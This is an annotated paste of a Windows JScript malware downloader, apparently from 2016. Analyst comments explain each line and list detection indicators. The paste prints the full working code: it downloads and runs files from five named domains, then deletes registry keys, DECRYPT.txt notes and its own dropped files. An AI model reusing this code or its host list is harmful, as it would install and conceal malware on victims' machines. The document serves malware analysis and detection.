Demonslay335

Untitled

Jun 30th, 2016
text 2.52 KB | None | 0 0
  // Analyst annotation (the code itself is unchanged; listing numbers are part of the paste).
  // Windows Script Host JScript downloader. It tries five hosts in turn to fetch three
  // files into %TEMP% (a.exe, php4ts.dll, a.php), runs a.exe with a.php as its argument,
  // then removes registry values/keys and DECRYPT.txt files and deletes what it dropped.
  // Observable artifacts for detection and triage, all taken from the lines below:
  //   - script host issuing GET http://<host>/counter/?ad=<string>&rnd=<digits>
  //   - %TEMP%\a.exe, %TEMP%\a.php, %TEMP%\php4ts.dll written by the script host
  //   - script host spawning %COMSPEC% /c ... (REG DELETE / del / DEL command lines)
  //   - the names "Crypted", ".crypted" and DECRYPT.txt, which look like ransomware
  //     artifacts (inferred from the names only; the paste does not say).
  //
  // ad: 34-character identifier sent to the server as the "ad" query parameter and later
  // used as filler text; its format resembles a Bitcoin address (not confirmed here).
  1. var ad = "1GvBs6wNH6R9kmLDYJmMsQNryni4ZVzy3P";
  // ld: index of the host that last served a payload; the host loop restarts from it.
  2. var ld = 0;
  // cq = double quote (char 34), cs = backslash (char 92). Building them at runtime keeps
  // literal quoted paths and registry paths out of the script text, so string-based
  // signatures have to match the concatenated pieces instead.
  3. var cq = String.fromCharCode(34);
  4. var cs = String.fromCharCode(92);
  // ll: the five download hosts (network indicators).
  5. var ll = "szallas-utazas-wellness.hu tsvetodom.ru zexum.com tbmcompany.com stroydek.ru".split(" ");
  6. var ws = WScript.CreateObject("WScript.Shell");
  // fn: base path %TEMP%\a (".exe" / ".php" appended later); pd: %TEMP%\php4ts.dll.
  7. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
  8. var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
  // COM objects: XMLHTTP for the download, ADODB.Stream to write binary data to disk,
  // FileSystemObject for existence checks and the overwrite step at the end.
  9. var xo = WScript.CreateObject("MSXML2.XMLHTTP");
  10. var xa = WScript.CreateObject("ADODB.Stream");
  11. var fo = WScript.CreateObject("Scripting.FileSystemObject");
  // Outer loop: n selects which of the three files is being fetched (3, 4, 5).
  12. for (var n = 3; n <= 5; n++) {
  // Inner loop: walk the host list starting at the last host that worked.
  13. for (var i = ld; i < ll.length; i++) {
  // dn: set to 1 once this file has been saved.
  14. var dn = 0;
  15. try {
  // Synchronous GET (third argument false). "&rnd=" + i + n concatenates the two numbers
  // as text (e.g. i=0, n=3 gives "03"), so the server can tell which file is requested.
  16. xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&rnd=" + i + n, false);
  17. xo.send();
  18. if (xo.status == 200) {
  19. xa.open();
  // type = 1 puts the ADODB stream in binary mode.
  20. xa.type = 1;
  21. xa.write(xo.responseBody);
  // Responses of 1000 bytes or fewer are discarded; only larger bodies count as a payload.
  22. if (xa.size > 1000) {
  23. dn = 1;
  // Save mode 2 overwrites an existing file.
  // n == 3 -> %TEMP%\a.exe
  24. if (n == 3) {
  25. xa.saveToFile(fn + ".exe", 2);
  // n == 4 -> %TEMP%\php4ts.dll
  26. } else if (n == 4) {
  27. xa.saveToFile(pd, 2);
  // n == 5 -> %TEMP%\a.php
  28. } else if (n == 5) {
  29. xa.saveToFile(fn + ".php", 2);
  30. };
  31. };
  32. xa.close();
  33. };
  // On success remember the working host and move on to the next file.
  34. if (dn == 1) {
  35. ld = i;
  36. break;
  37. };
  // Any error (DNS failure, refused connection, write error) is swallowed and the next
  // host is tried, so failed attempts leave no script-level trace.
  38. } catch (er) {};
  39. };
  40. };
  // Continue only if all three files are on disk.
  41. if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
  // Runs a.exe with the quoted a.php path as its argument, in a normal window (1) and
  // waiting for it to exit (1). Given the php4ts.dll name next to it, a.exe is presumably
  // a PHP interpreter executing the downloaded script (not verifiable from this paste).
  42. ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 1, 1);
  // The remaining commands run hidden (0) and without waiting (0).
  // Deletes the "Crypted" value under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
  43. ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /F", 0, 0);
  // Deletes the HKCR\.crypted and HKCR\Crypted keys (a file-extension registration).
  44. ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCR" + cs + ".crypted" + cq + " /F", 0, 0);
  45. ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCR" + cs + "Crypted" + cq + " /F", 0, 0);
  // Deletes DECRYPT.txt from two Desktop locations.
  46. ws.Run("%COMSPEC% /c del " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
  47. ws.Run("%COMSPEC% /c del " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
  // Recreates a.php (overwrite = true) and fills it with 1000 copies of ad before it is
  // deleted - presumably so the original script content is harder to recover from disk.
  // For responders: a.php found on disk may hold only this filler, not the real payload.
  48. var fp = fo.CreateTextFile(fn + ".php", true);
  49. for (var i = 0; i < 1000; i++) {
  50. fp.WriteLine(ad);
  51. };
  52. fp.Close();
  // Removes the three dropped files. a.exe and php4ts.dll are not overwritten first.
  53. ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
  54. ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
  55. ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
  56. };